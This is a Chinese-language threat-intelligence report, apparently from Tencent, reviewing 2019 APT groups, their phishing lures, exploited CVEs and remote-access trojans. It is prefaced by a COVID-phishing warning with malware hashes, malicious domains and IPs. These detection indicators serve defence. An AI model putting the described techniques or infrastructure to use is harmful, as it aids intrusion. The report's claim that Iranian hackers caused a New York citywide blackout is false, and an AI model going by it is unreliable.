在全球新冠疫情全球大爆发的时候,利用新冠疫情相关诱饵进行的网络攻击,其中有些攻击对象还包括医疗机构,手段可谓卑劣至极!因此我们提醒政企机关单位和个人,务必提高警惕,勿轻易信任何与疫情有关的资讯邮件,勿轻易启用Office的宏代码查看文档。

IOCs

MD5

f6fe2b2ce809c317c6b01dfbde4a16c7 

0e5f284a3cad8da4e4a0c3ae8c9faa9d  

aa5c9ab5a35ec7337cab41b202267ab5  

d739f10933c11bd6bd9677f91893986c   

d9ce6de8b282b105145a13fbcea24d87

a9dac36efd7c99dc5ef8e1bf24c2d747

a4388c4d0588cd3d8a607594347663e0

1b6d8837c21093e4b1c92d5d98a40ed4

31f654dfaa11732a10e774085466c2f6

0573214d694922449342c48810dabb5a

501b86caaa8399d508a30cdb07c78453

e96d9367ea326fdf6e6e65a5256e3e54

da44fd9c13eb1e856b54e0c4fdb44cc7

e074c234858d890502c7bb6905f0716e

e262407a5502fa5607ad3b709a73a2e0

ce15cae61c8da275dba979e407802dad

b7790bf4bcb84ddb08515f3a78136c84

379f25610116f44c8baa7cb9491a510d

7a1288c7be386c99fad964dbd068964f

258ed03a6e4d9012f8102c635a5e3dcd

f272b1b21a74f74d5455dd792baa87e1

域名:

m.topiccore.com

libjs.inquirerjs.com

vitlescaux.com

vnext.mireene.com

crphone.mireene.com

new.915yzt.cn

primecaviar.com

bralibuda.com

dysoool.com

m0bile.net

fuly-lucky.com

IP:

63.250.38.240

107.175.64.209

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

一、前言

高级可持续性攻击,又称APT攻击,通常由国家背景的相关攻击组织进行攻击的活动。APT攻击常用于国家间的网络攻击行动。主要通过向目标计算机投放特种木马(俗称特马),实施窃取国家机密信息、重要企业的商业信息、破坏网络基础设施等活动,具有强烈的政治、经济目的。

整个2019年,虽然没有太过于轰动的攻击事件,但是攻击的事件却有增无减。腾讯安全威胁情报中心根据团队自己的研究以及搜集的国内外同行的攻击报告,编写了该份2019年APT攻击研究报告。根据研究结果,我们认为主要的结论如下:

1、 中国依然是APT攻击的主要受害国,受到来自于东亚、东南亚、南亚、欧美等各个区域的网络威胁;

2、网络攻击形势跟地域政治局势有相当密切的关联,地域安全形势复杂的地区,往往是APT攻击最为严重和复杂的地区;

3、多平台的攻击能力已经成为大量APT攻击者组织的标配能力;

4、0day依然是最有效的攻击工具,一些组织依然不计成本来购买会自己挖掘0day来进行攻击。

二、2019年高级可持续性威胁概览

2019年在网络安全领域是个不平静的一年,虽然没有像WannaCry那样具有全球轰动效应的网络攻击事件,但是常态化的攻击事件确有增无减。这一年来,网络安全事件频发,高级持续性威胁(APT)也处于持续高发状态,无论是APT组织数量,还是APT攻击频率,相比往年都有较大的增长。腾讯安全威胁情报中心针对全球所有安全团队的安全研究报告进行研究,并提取了相关的指标进行持续的研究和跟踪工作。同时,我们针对相关的研究报告进行了一个梳理和归纳,经过不完全统计,2019年全球安全厂商披露的总报告数量近500起,这数据一个可以说明全球APT攻击态势呈现增长态势,另一个也说明安全厂商也投入了更多的经历研究和对抗APT攻击。

1.png

图1:2015至2019年,全球主要厂商披露的APT攻击事件数量 

大部分APT组织背后都有着深厚的政府背景,他们不惧怕法律的打击,也不会因为安全厂商的披露而停止攻击活动,大部分攻击者在攻击活动被暴露后会改头换面、更新自己的武器库后重新发起新一轮的网络攻击,更有部分组织对安全厂商的曝光毫不在意,曝光后毫不收敛甚至变本加厉继续对目标发起攻击,据不完全统计,在2019年全球各大安全厂商披露的APT攻击事件中,新组织所占的比例不足2成,绝大部分是老组织新的攻击活动,这也直接印证了攻击不会因为曝光而停止,APT与反APT的对抗是长期战斗。

2.png

图2:2019年曝光的APT组织新旧对比 

从国内受害者的性质来看,政府、央企国企、科研单位和高校依然是APT攻击的重灾区,尤其是涉及对外进出口、国防军工、外交等重点单位,从行业分布上看,受攻击最多的是政府,其次是金融行业、军工行业、科研单位、高校。此外基建、软件、传媒等行业也是APT攻击的重点目标。

3.png

图3:2019年中国大陆被攻击目标属性分布 

而从攻击地域上来看,根据腾讯安全威胁情报中心的统计显示(不含港澳台地区),2019年中国大陆受APT攻击最多的地区为北京和广西,此外还有辽宁、云南、海南、四川、广东、上海、浙江、山东、黑龙江等。详见下图(不含港澳台地区)。

4.png

图4:2019年中国大陆被APT攻击的地区分布图

三、中国面临的APT攻击威胁

中国历来都是APT攻击的主要受害国,随着中国经济的快速发展,以及国际地位的不断攀升,中国面临的外部威胁形势更加严峻。根据腾讯安全威胁情报中心的监测以及公开的报告和资料,我们将在2019年对中国大陆有过攻击的组织按疑似的地理位置分为东亚方向、东南亚方向、南亚方向、其他方向。 

组织归属地 代表
东亚 DarkHotel、Higaisa(黑格莎)、Group123(APT37)、Lazarus、穷奇等
东南亚 海莲花(APT32)
南亚 BITTER(蔓灵花)、Patchwork(白象)、Sidewinder(响尾蛇)等
其他 Lamberts、Turla等

表1:2019年攻击中国的APT组织地域分布表 

3.1   东亚方向的威胁

东亚的威胁主要来自朝鲜半岛等地区,该地区向来是全球政治冲突、军事冲突的敏感地带,也是APT活动的热点区域之一。此方向的APT组织具有很强的政治背景,常攻击我国政府、外贸、金融、能源等领域的公司、个人及相关科研单位。该方向黑客组织十分庞大,往往呈集团化运作,有国家力量背书。在整个2019年,该方向的攻击组织,包括Darkhotel、Higaisa(黑格莎)、Lazarus、Group123(APT37)、毒云藤、穷奇等都非常的活跃,均有对国内的目标进行钓鱼活动和攻击。

3.1.1  DarkHotel和Higaisa(黑格莎)

DarkHotel自2014年该组织被卡巴斯基曝光以来到如今已经5年多了,被曝光以后,该组织不断对其攻击方式和武器库进行更新,以求攻击的更隐蔽,攻击成功率更高,以及更难以清除等。而黑格莎(Higaisa)为腾讯安全威胁情报中心在2019年11月最先披露的APT攻击组织,该组织常常在节假日来临的时候,通过发送节日问候的邮件来进行钓鱼攻击。目前暂无更多的证据来证明这两个组织之间存在一定的关联,或者说是同一个组织分化的不同攻击小组,但是由于这两个组织都来自于朝鲜半岛,而且攻击的方式和手段、以及攻击的目标都有一定的类似性,因此我们暂且把DarkHotel和Higaisa放在一起来进行描述。后续我们会持续的跟踪这两个组织的新的攻击动向,以求找到更多的证据来证明这两个组织同属一家或者具有不同的组织背景。

DarkHotel在2019年的攻击活动频繁,主要使用钓鱼、感染文件多种格式文件、水坑攻击等来进行。不仅攻击频繁,其技术能力也相对较高,有使用0day进行攻击的能力。

活动一:使用寄生兽特马针对中国的外贸企业进行攻击活动

今年的攻击活动跟以往有所不同,以前是通过将大量开源代码加入到木马工程中编译以实现隐藏恶意代码的目的,今年则出现通过替换正常的软件文件来实现劫持的目的。如使用篡改网易邮箱大师等软件客户端来实现攻击。

5.png

图5:捆绑有寄生兽木马的网易邮箱大师程序

此外,引入了更加稳定的开源远程控制木马XRAT来实现对目标主机更加稳定地控制:

6.jpg

图6:2019新引入的xrat开源远程控制木马 

活动二:使用浏览器0day进行攻击

在2019年DarkHotel使用了IE浏览器0day(CVE-2019-1367)进行攻击(攻击进行时漏洞还未修复),攻击方式包括钓鱼攻击和水坑攻击。

如入侵某重要企业的管理登录页面,插入恶意代码来进行攻击:

7.png

图7:被DarkHotel入侵的某管理后台 

嵌入的脚本根据系统x86或x64执行不同利用脚本,触发CVE-2019-1367漏洞:

8.png

图8:x86和x64的执行脚本 

此外还有使用某国内浏览器漏洞进行攻击的钓鱼事件:

9.png

图9:钓鱼邮件 

该钓鱼邮件中嵌入了一个恶意链接,若打开该链接的浏览器存在漏洞,则会触发恶意文件下载,否则会下载一个正常的pdf文件:

10.png

图10:pdf内容 

活动三:使用购买的HackingTeam的军火库进行攻击活动

在2019年,我们奇怪的发现了大量的DarkHotel的Asruex特马,并且受控机众多,称持续性的活跃状态。这非常反常理,因为APT攻击是针对性极强的攻击活动,很少是大规模的攻击活动。而且经过分析,所有特马都为老版本的文件,且C&C服务器也早已失效。

11.png

图11:Asruex的C&C服务器连接走势 

经过深入分析发现,原来是Asruex具有文件感染的功能,能够感染包括doc、pdf、exe等文件,从而导致大量的文件被感染。

12.png

图12:Asruex感染过程 

而该次攻击的C&C的域名themoviehometheather.com,疑似为Hacking Team所拥有。而且,DarkHotel购买Hacking Team的军火库也并非首次:

13.png

图13:卡巴斯基关于DarkHotel使用HackingTeam军火库的相关报导 

这也跟之前曝光的韩国情报官员因为购买HackingTeam间谍软件而自杀的事件相印证。

14.png

图14:韩国情报官员自杀的相关报导

黑格莎(Higaisa)是一个至少从2016年就开始活跃的攻击组织,该组织常利用节假日、朝鲜国庆等朝鲜重要时间节点来进行钓鱼活动,诱饵内容包括新年祝福、元宵祝福、朝鲜国庆祝福,以及重要新闻、海外人员联系录等等。此外,该攻击组织还具有移动端的攻击能力。被攻击的对象还包括跟朝鲜相关的外交实体(如驻各地大使馆官员)、政府官员、人权组织、朝鲜海外居民、贸易往来人员等。目前监测到的受害国家包括中国、朝鲜、日本、尼泊尔、新加坡、俄罗斯、波兰、瑞士等。

15.jpg

图15:黑格莎的攻击流程图

16.png

图16:黑格莎在2019年底的一次钓鱼攻击活动

17.png

图17:黑格莎使用的节假日的钓鱼诱饵图片

此外,自从腾讯安全威胁情报中心曝光该组织的攻击活动后,该组织也悄然的改变了其攻击技术,如对dropper进行了重写,舍弃了原来将payload存放在资源及使用“higaisa”作为密钥进行rc4解密的方式。其次还使用dll侧加载技术来执行payload:

18.png

图18:黑格莎使用dll侧加载技术来执行payload

3.1.2   Lazarus和Group123(APT37)

Lazarus和Group123均为来自朝鲜的攻击组织。其中Lazarus常被认为是来自朝鲜的攻击组织的总称,而Group123常也被认为为Lazarus的一个攻击分支。无论是Lazarus还是Group123均有政府背景。

但事实上,两个组织的攻击侧重稍有不同。其中Lazarus的攻击常常具有经济目的,攻击目标包括银行、金融机构、数字货币交易所等,攻击范围常覆盖全球。当然也包括一些政府机构。而Group123的攻击活动主要集中在中国、韩国等,攻击目标包括国内的外贸公司、在华外企高管,甚至政府部门,包括领事馆等,目的性上以窃取机密文件(包括商业机密)为主。

Lazarus在2019年攻击了中国多个虚拟货币平台,遗憾的是,因为某些原因我们未获取到完整的攻击链条,但是通过部分代码特征,可以清晰的关联到为Lazarus所为:

19.png

图19:Lazarus的解密key 

而Group123的活动则更为活跃,我们还新捕获了多个从未被披露过的RAT。

20.jpg

图20:某次Group123的攻击诱饵 

而跟传统一样,Group123依然针对不同的机器下发定制的恶意文件模块。模块的功能包括执行shell、下载文件、执行文件、上传文件等。

21.png

图21:打包收集机器上特定后缀名的文件 

此外,该组织在其他的攻击活动中,还使用了CVE-2017-8570来进行攻击活动:

22.png

图22:Group123的攻击诱饵 

攻击过程中,采用纯脚本进行攻击,提升了隐蔽性:

23.png

图23:Group123的攻击细节 

更令人意外的是,我们在Group123的某台受控机上,还找到了归属为DarkHotel的特马文件Inexsmar。我们相信,该目标同时为Group123和DarkHotel的攻击目标。而从卡巴斯基之前的报告中,也提到过相应的信息:

24.png

图24:某一目标被攻击时间线(截图自卡巴报告,见参考链接3)  

3.1.3   穷奇(毒云藤)

穷奇(毒云藤)对中国大陆持续攻击时间长达数十年的老组织,其攻击对象绝大部分为中国大陆的军工、科研、教育、政府等单位,是专门针对中国大陆而生的黑客组织。该组织近年来攻击活动有所收敛,攻击事件大大减少,但是攻击活动从未停止过,攻击手段和攻击技术也在不断的提升中。

在2019年,该组织使用编号为CVE-2018-20250的WinRAR ACE漏洞投递了几次恶意文件,但是更多的经历投入了钓鱼攻击中。

25.png

图25:穷奇组织的钓鱼邮件 

26.png

图26:带有CVE-2018-20250漏洞的压缩包附件 

27.png

图27:解压后释放的恶意文件 

而该组织的使用的钓鱼攻击,则主要是通过仿造QQ邮箱中转站和网易邮箱超大附件下载的页面,诱骗被攻击者输入账号密码的方式,来达到窃取邮箱账户和密码的目的,从而进行下一阶段的攻击。

28.png

图28:伪造成QQ邮箱中转站的钓鱼界面 

29.png

图29:盗取的QQ邮箱账号和信息

30.png 图30:登录后的下载界面 

31.png

图31:伪造成网易邮箱的超大附件下载的钓鱼界面 

32.png

图32:盗取的网易邮箱账号和信息 

部分钓鱼攻击使用的文件信息:

律师资格.rar
2020新法律法规汇总表.doc
关于调整部分优抚对象等人员抚恤和生活补助标准的通知.pdf
院科研外协供方专家资格推荐表.doc
会议资料-定稿ppt.rar
[非密]WGD9021H产品手册.rar
欧睿国际简介.pdf
关于加强党的政治建设的意见.docx
XXX可行性研究总体报告.doc
……

表2:使用的部分钓鱼附件文件名

3.2  东南亚方向的威胁

东南亚方向的威胁,最典型的代表就是海莲花(APT32、OceanLotus),该组织的技术能力相对较弱,但是却是最勤奋的APT攻击组织,不仅是近年来针对中国大陆攻击最频繁的组织,而且还不断的更新其攻击的手段。在2019年,腾讯安全威胁情报中心也多次曝光了该组织的攻击活动。

该组织的攻击的目标众多且广泛,包括政府部门、大型国企、金融机构、科研机构以及部分重要的私营企业等。并且我们监测到,有大量的国内目标被该组织攻击而整个内网都沦陷,且有大量的机密资料、企业服务器配置信息等被打包窃取走。此外我们发现,该组织攻击人员非常熟悉我国,对我国的时事、新闻热点、政府结构等都非常熟悉。

33.png

图33:海莲花的某次攻击流程 

在2019年的攻击中,海莲花给人印象最深的就是定制化后门。下发的后门针对每台机器下发的恶意文件,都使用被下发机器的相关机器属性(如机器名)进行加密,而执行则需要该部分信息,否则无法解密。因此每个下发的恶意文件都不一样,而且即便被安全厂商捕捉,只要没有该机器的相关遥感数据就无法解密出真正的payload。最终解密后的恶意文件主要为CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。

34.png

图34:海莲花特马的payload解密流程 

而在快接近年底的攻击中,我们还首次发现了海莲花使用了多重载荷的攻击。在解密shellcode后,会先下载shellcode执行,如果下载不成功,再来加载预先设定好的RAT:

35.png

图35:海莲花特马执行流程 

该方式使得攻击更加的丰富和多样性,并且也可控,这或许会成为海莲花2020年的主流的攻击的主要方式。

3.3  南亚方向的威胁

南亚方向的攻击组织对中国大陆的攻击活动已经持续了近10年,代表组织有BITTER(蔓灵花)、白象(摩诃草、Patchwork、HangOver)、响尾蛇(SideWinder)、肚脑虫(donot)等。而这些组织之间又存在某些相似和关联,这一点在我们以往的报告中也有所提及。

3.3.1   BITTER(蔓灵花)

BITTER(蔓灵花)也是对中国大陆进行攻击的比较频繁的一个攻击组织,攻击目标包括外交相关部门、军工、核能等企业。在2019年,该组织的整体的攻击方式变化不大,但是下发的恶意文件跟以往相比有了一些变化,启用了多个木马组件,主要为改装的公开源代码的远程控制木马。

如改编的C#远控DarkAgent(https://github.com/ilikenwf/DarkAgent),保留了该开源远控的大部分功能,包括文件管理、进程管理、CMDShell等。

36.png

图36:蔓灵花的新木马组件DarkAgent 

再如改编的C#远控(https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client),同样保留了文件管理、CMDShell等功能等。

37.png

图37:蔓灵花的新木马组件 

以上两个RAT的出现,说明了蔓灵花组织正在尝试使用修改开源的代码来进行攻击,这或许会为我们以后的分析和属性归属带来一定的难度,需要持续保持关注。

除此之外,蔓灵花还持续在进行钓鱼活动:

38.png

图38:蔓灵花的钓鱼页面1 

39.png

图39:蔓灵花的钓鱼页面2 

值得注意的是,该组织还在2019年被某安全研究员公开了其后门页面:

39.png

图40:被曝光的用于下发恶意模块的木马后台界面

3.3.2  白象

白象组织,也叫摩诃草、Patchwork、HangOver,也是经常针对中国大陆进行攻击的组织,除了中国大陆的目标外,巴基斯坦也是该组织的主要目标。该组织的攻击活动以窃取敏感信息为主,最早可以追溯到2009年11月,至今还非常活跃。在针对中国地区的攻击中,该组织主要针对政府机构、科研教育领域进行攻击。

在2019年上半年,该组织的badnews木马还在活跃中,但是到了2019年下半年,该组织新开发了一款名为CnCRAT的远程控制木马,并对我国多个政府机构、科研单位发起了攻击,与该组织以往的badnews等木马相比,新的CnCRAT木马同样使用github等第三方平台来分发木马、C2等,其攻击的目标和攻击的手段也是具有一定的延续性。 

41.png

图41:白象的诱饵文件 

42.png

图42:CnCRAT木马的github托管地址 

3.3.3  SideWinder(响尾蛇)

SideWinder(响尾蛇)是腾讯安全威胁情报中心最早在2018年披露的APT攻击组织。在发现伊始,我们发现该组织的攻击目标均为巴基斯坦的目标。但是从2019年开始,我们监测到,该组织对中国境内的目标也开始发起了攻击。攻击目标包括军事目标、军工、国防等。其攻击目标跟BITTER(蔓灵花)有一定的重合。

该组织初始攻击同样舍弃了直接在邮件中附带附件的方式,而是使用在邮件中插入钓鱼链接的方式。这使得攻击具有一定的时效性,十分考验安全公司及相关部门的安全运维人员的发现能力和速度。

43.png

图43:SideWinder的钓鱼邮件 

payload的加载方式跟之前没什么变化,依然采用dll侧加载(白加黑)的方式,而最终的RAT同样为传统的C# RAT。

44.png

图44:SideWinder的payload加载方式

45.png

图45:SideWinder的最终RAT

3.4  其他方向的威胁

其他方向的威胁主要来自欧美国家,典型代表如方程式、Lamberts、Turla等。该方向的组织的技术能力跟其他方向的组织能力上不可同日而语。由于该方向的组织攻击方式大多从重要目标防火墙、路由器、邮件服务器、IOT设备等入手,通过漏洞层层植入木马(也可能无木马实体存在),技术手段十分高超。此外,其用于攻击的通信设备很多都是被攻陷的物联网设备,甚至还有劫持卫星的通信,且用完即丢,因此发现难度非常大。

如在2019年某些设备上发现的一些pipeloader,利用SMB来传输并注册,并且伪装成系统文件,非常难以被发现。

四、国际APT攻击形势

高级持续性威胁(APT)被认为是地缘政治的延伸,甚至是战争和冲突的一部分,2019年的网络攻击活动依然与全球政治冲突、军事冲突热点形成高度相关性,如美伊中东冲突、印巴冲突,朝韩对峙,俄欧对峙等等。

46.png

图46:热点区域相关APT事件占比

4.1  朝韩对峙

2019年朝鲜半岛的紧张局势逐渐好转,美国总统特朗普历史性地访问朝鲜的土地,大大缓和了朝鲜半岛的紧张局势,虽然政治上和军事上的紧张局势逐渐缓和,但是网络层面的互相攻击,互相刺探情报的活动却有增无减。2019年,朝鲜半岛相关的APT组织的活跃度依然高居榜首。其中最具代表性的组织为Kimsuky和darkhotel。

Kimsuky组织为韩国安全厂商给取的名,实际腾讯安全威胁情报中心在2018、2019均披露过的Hermit(隐士)归为同一攻击组织。该组织在2019年异常活跃,多次针对韩国的目标进行了攻击,如针对韩国统一部进行攻击:

47.png

图47:Kimsuky针对韩国统一部进行的钓鱼攻击 

而同样,DarkHotel使用了Chrome 0-day exploit CVE-2019-13720针对朝鲜的目标进行了名为” WizardOpium “的攻击活动(引用自卡巴斯基的报告,见参考链接4)。

该攻击使用水坑攻击了朝鲜某新闻网站:

48.png

图48:被攻击的朝鲜网站(引用自安全研究员cyberwar15,见参考链接5) 

49.png

图49:被攻击网站中插入的恶意代码(引用自安全研究员cyberwar15,见参考链接5) 

从今年的攻击能力和攻击效果上看,明显南方的DarkHotel更胜一筹。当然Lazarus等组织同样具有使用0day的能力,实力同样不可小觑。

4.2  印巴冲突

印度和巴基斯坦同属于南亚地区的两个国家,由于一些历史原因,两国一直不大和睦,冲突不断。从2019年初开始,双方关系突然紧张,冲突升级。今年2月,印度空军飞越克什米尔巴方实控线,被巴军方击落并俘获一名印度空军飞行员,同时这也是印度首次袭击巴基斯坦境内。两国在克什米尔军队集结并且频繁交火,印方甚至水淹巴基斯坦,打开阿尔奇大坝,造成巴基斯坦面临洪水的危机,同时印方几日前公开宣称,可能会先对巴基斯坦使用核武措施。

随着双方的军事冲突愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事件后,腾讯安全威胁情报中心曾捕获并发布了一例以此次冲突事件为诱饵的APT攻击样本,分析后确认了该样本源于巴基斯坦的APT攻击组织TransparentTribe,此外印度针对巴基斯坦的攻击活动也一直在持续中,腾讯安全威胁情报中心也曾多次发布相关的分析报告。

50.jpg

图50:白象的攻击诱饵

项目类型 内容
组织名称 BITTER Patchwork White Company Confucius SideWinder donot TransparentTribe
中文名 蔓灵花 白象   孔子 响尾蛇 肚脑虫  
攻击者 印度 印度 印度 印度 印度 印度 巴基斯坦
攻击国家 巴基斯坦、中国等 巴基斯坦、中国等 巴基斯坦 巴基斯坦 巴基斯坦、中国等 巴基斯坦、中国等 印度
攻击目标 政府部门(尤其是外交机构)、军工企业、核能企业等 政府机构、科研教育机构和研究所等 政府、军方、军事目标 政府、司法部门、军方等 政府、军方、军事目标 政府、军方、军事目标、商贸人员 政府、军方、军事目标
攻击目的 窃取敏感资料、信息等 窃取敏感资料、信息等 窃取敏感资料、信息等 窃取敏感资料、信息等 窃取敏感资料、信息等 窃取敏感资料、信息等 窃取敏感资料、信息等
攻击时间 至少从2013年持续至今 至少从2009年持续至今 至少从2016年持续至今 至少从2013年持续至今 至少从2012年持续至今 至少从2017年持续至今 至少从2012年持续至今
曝光时间 2016年由美国安全公司Forcepoint进行了披露 2016年Cymmetria对该组织进行了披露 2018年由cylance公司进行了披露 2018年由趋势科技(trendmicro)进行了披露 最早在2018年5月被腾讯威胁情报中心曝光 最早在2018年3月由NetScout公司的ASERT团队进行了披露 最早在2016年3月被proofpoint披露
攻击方式 钓鱼网站;短信;社交网站投递;鱼叉攻击->Zip->自解压程序->第一阶段downloader->下载分发任务组件 鱼叉攻击->Zip->白利用->RAT 鱼叉攻击->Zip ->RAT 鱼叉攻击->Zip ->RAT 鱼叉攻击->hta->白+黑(Rat); GooglePlay投递 鱼叉攻击->Zip->RAT;短信;社交网站投递 鱼叉攻击->Zip->RAT
诱饵类型 Office、自解压、InPage、apk等 Office、apk等 Office Ingae、apk等 Doc、lnk、apk等 Office、Apk等 Office、Apk等
编程语言 C++、C#、java C++、C#、java C++、delphi、C#等 C++、delphi、java VB、js、vbs、powershell、C#、java等 VB、C++、java等 VBS、C#、Python、java等
攻击平台 Windows、Android等 Windows、Android等 Windows Windows、Android等 Windows、Android等 Windows、Android等 Windows、Android等

表3:南亚各APT组织信息简介

4.3  美伊局势

对于美国和伊朗来说,2019年是不平凡的一年。两国的局势在2019年越来越紧张,如伊朗高级军官被炸死、美军基地被轰炸等等,差点爆发区域战争。战争阴霾下的网络攻击也暗流涌动,两国在网络攻击领域互相进行多次激烈交锋。

如美国攻击了伊朗的**控制系统、情报系统;攻击并摧毁了伊朗准军事部队用来策划针对油轮袭击的一个关键数据库,该行动削弱了伊朗秘密打击波斯湾航运运输的能力等等。

51.png

图51:美国攻击伊朗数据库的新闻截图(参考链接6) 

而伊朗的一些APT组织同样对美国进行还击,如APT33伪造美国白宫文件,针对美国进行攻击:

52.png

图52:APT33针对美国的攻击文件 

如伊朗革命卫队下属的网络电子信息部队攻击纽约市多个变电站的控制中心,导致了纽约全城大约4个小时的停电。

53.png

图53:纽约停电的相关报导 

4.4  中东地区

中东地区是世界上政治最复杂的地区。此外,大量的恐怖袭击、局部冲突等也在此地区大量的出现。随着中东地缘政治紧张局势的加剧,中东地区的网络间谍活动的数量和范围也大大增加。以APT34为代表的APT组织在2019年异常活跃,2019年该组织被曝光多起利用LinkedIn传送攻击诱饵对中东地区的政府、能源、油气等行业发起的APT攻击事件。MuddyWater组织也是2019年最活跃的APT组织之一,出现了该组织大量的攻击诱饵,其中绝大部门诱饵为带有恶意宏代码的office文件。

54.jpg

图54:APT34利用LinkedIn发送攻击诱饵 

55.jpg

图55:MuddyWater的钓鱼诱饵

4.5  俄欧对峙

俄罗斯跟欧洲的一些国家,如前苏联国家的网络攻击,主要以俄罗斯为主导,攻击组织包括APT28、Turla、Gamaredon等。其中Gamaredon最为活跃,而turla的技术能力更为高超。

Gamaredon主要针对乌克兰政府、国防、军队等单位进行攻击活动,其活动最早可追溯至2013年。在2019年,该组织异常活跃,频繁的对乌克兰目标进行了攻击。该组织有点类似海莲花,虽然技术能力相对普通,但是却是非常勤奋。

56.png

图56:Gamaredon的钓鱼邮件

57.png

图57:Gamaredon的攻击流程

相对Gamaredon,Turla是个技术能力一流的攻击组织,同样被归属于俄罗斯。该组织常攻击MicrosoftExchange邮件服务器,传播恶意文件。

58.png

图58:Turla的攻击流程(引用自ESET报告,见参考链接8)

而另据英国国家网络安全中心(NCSC)的报告,Turla还劫持了伊朗组织APT34的基础设施和恶意软件进行攻击。

59.png

图59:Turla劫持APT34报告(见参考链接9)

五、2019年攻击总结

整个2019年,攻击众多,我们根据其攻击的目标和目的性以及技术特点两方面来进行总结。

5.1   攻击目标和目的性总结

5.1.1    攻击更加注重经济效益

从往常的攻击来看,APT攻击更加注重政治利益,以国家背景做背书。但是在2019年的攻击中,我们发现了一些以经济为主的攻击活动。

如Lazarus攻击多个数字货币交易所,并窃取了数字货币;

如Lazarus还跟臭名昭著的僵尸网络Trickbot合作,共同获取相应效益(Trickbot常投递银行木马和勒索软件):

60.jpg

图60:Lazarus和Trickbot的关联(见参考链接10) 

又如FIN6组织进行了多起针对性的勒索软件攻击,如针对法国亚创集团(Altran)的勒索攻击:

61.png

图61:亚创针对勒索病毒攻击的报告(见参考链接11)

此外,Fin6还针对挪威海德鲁公司(Norsk Hydro)、英国警察联合会(Police Federation)、美国化学公司瀚森(Hexion)和迈图(Momentive)进行了一系列的攻击活动。

其他还有老牌的针对金融目标进行攻击的组织TA505、Fin7、Buhtrap等也在2019年频繁进行了攻击活动。

5.1.2   攻击更多的转向民生和基础设施

2019年,还被揭露了多个针对基础设施的攻击活动。

如lazarus被披露在9月-10月期间,对印度的Kudankulam核电厂进行了攻击:

62.png

图62:安全人员分享的攻击样本(见参考链接12) 

不仅仅是核电厂,印度航天研究组织(ISRO)也同样披露说遭到攻击,这是否和Chandrayaan-2 (月船2号)登月计划失败有一定的关联?

63.png

图63:关于ISRO被攻击的相关报导(见参考链接13)

5.2  攻击技术总结

5.2.1   使用0day攻击

0day被认为是网络攻击中的军火库,0day 漏洞的发现和使用能力,在一定程度上体现了APT组织的实力。

64.png

图64:黑市上0day的价格

65.png

图65:黑市上0day的价格

即便如此,在2019年依然有不少APT组织使用0day,对一些目标进行了攻击。这也说明很多APT组织都依托国家背景,可以不计任何代价挖掘0day或者购买0day。

66.png

图66:野外0day用于APT攻击汇总

5.2.2  供应链攻击

供应链攻击是APT攻击中常用的攻击方式,当网络钓鱼和渗透入侵无法攻破目标防御系统时,攻击者可能会倾向于使用供应链污染的方式去寻找其供应链环节中的薄弱点进行曲线攻击。2019年,供应链攻击也时有发生。

如卡巴斯基曝光的ShadowHammer使用华硕的升级服务进行供应链攻击:

67.png

图67:ShadowHammer的攻击流程(引用自卡巴报告,参考链接15) 

又如ESET披露的BlackTech组织使用华硕的数字签名和华硕的WebStorage服务器进行供应链攻击,分发恶意软件:

68.png

图68:BlackTech的攻击流程(引用自ESET,参考链接16) 

5.2.3  黑吃黑现象时有发生

虽然很多APT组织都具有国家背景,技术能力高超,但是同样不乏被黑吃黑的案例出现。在2019年,就发生了多起APT组织被其他组织攻击的案例。

如APT34组织的大量工具代码被泄露,MuddyWater组织的大量工具代码被进行售卖。而Turla还攻击了APT34的一些基础设施,使得利用APT34的基础设施进行攻击活动。

种种黑吃黑现象也说明,一山更比一山高,就算是技术能力高超的APT攻击组织,同样会因为某些方面的缺陷而被其他的APT组织攻击,包括技术缺陷、人为缺陷等。

5.2.4 多平台攻击能力逐渐成为APT组织的常规能力

除了windows系统,Mac系统、Linux系统,以及移动端平台,也逐渐成为APT攻击的战场。多平台攻击的能力,逐渐成为APT组织的技术标配。

如我们熟悉的海莲花、白象、蔓灵花、肚脑虫、黑格莎、lazarus、Kimsuky等等组织,都具有了多平台的攻击能力。

69.png

图69:Lazarus的mac攻击活动

70.png

图70:donot的移动端攻击活动

5.2.5  假旗(FlaseFlag)现象众多

在攻击溯源过程中,我们把可疑模仿或者伪造其他组织的TTPs(技术、战术、过程)的活动成为假旗(FlashFlag),假旗的目的使得跟踪组织归属更加困难,也同样达到了嫁祸给其他组织的目的。但是,再好的模仿,也可能存在某些漏洞或者缺陷,导致被发现,如代码细节、基础设施等等。

2019年的攻击过程中,我们也发现了多个假旗活动,包括海莲花、白象、响尾蛇(SideWinder)、lazarus、TransparentTribe等。

如donot模仿TransparentTribe的假旗活动:

71.png

图71:代码比较(左边Donot,右边TransparentTribe) 

如针对海莲花的假旗活动:

72.png

图72:名字和payload执行方式模仿海莲花

六、2020年威胁趋势预测

6.1   勒索病毒和APT攻击

在2019年,已经有一些APT组织开始分发勒索病毒来进行勒索攻击,如Fin6等。虽然传播勒索病毒,会带来一定的直接的经济效益,但是我们更多的认为,一些APT组织为了隐藏和破坏自己的行踪,在攻击被中途发现或者攻击结束后,释放勒索病毒达到毁尸灭迹的目的。

事实上,我们曾遇到过一个奇怪的现象,在我们分析调试某个APT组织的恶意文件的过程中,机器突然中了wannacry勒索病毒,而我们的研究人员从未在分析机上下载和分析过wannacry勒索病毒,因此也不存在误点的可能。最终经过溯源发现,是该APT组织的工具所下发的,可能是该组织的人员发现他们的攻击工具正在被调试,从而下发勒索病毒毁灭证据。

6.2  针对基础行业和设施的攻击会增多

在2019年,已经出现多起针对能源、电信等基础行业和设施的攻击活动。目前一些APT组织已经不仅仅是以窃密为核心目标,转为破坏和民生相关的一些基础设备,如电力系统等。处于战争边缘国家之间的网络攻击,尤为如此。

6.3  物联网设备成为新的攻击目标

随着5G技术的发展,智能联网设备的普及可能导致新的攻击目标,如敏感目标附近的智能音响,智能摄像头,智能电表,甚至任何一种智能家居都可能成为新的目标,物联网设备虽然很少有可以直接获取文档类信息的方法,但足以获取声音、视频等敏感信息,甚至物联网设备还可能成为由公网进入内网的攻击跳板。

6.4  漏洞利用更加频繁

